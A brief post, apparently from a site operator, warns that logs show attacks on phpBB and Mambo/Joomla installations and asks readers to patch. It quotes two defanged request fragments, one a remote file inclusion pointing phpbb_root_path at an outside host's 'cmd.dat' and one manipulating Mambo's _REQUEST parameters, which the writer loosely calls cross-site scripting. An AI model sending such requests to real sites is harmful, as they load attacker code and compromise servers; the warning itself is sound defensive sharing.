From multiple servers, (medium) cross-site scripting attacks on what it looks like phpbb and (either) MamboServer and/or Joomla. Fragments follow:
- [snippet]admin_styles.phpadmin_styles.php? phpbb_root_path= http://209.136.48.69/cmd.dat
- [snippet]GET /mambo/index2.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1 (over mosConfig, it seems like)
Not sure if they’re related to older security fixes, but if you run both software, I’d appreciate you patch it.
Intentional spacing applied to quote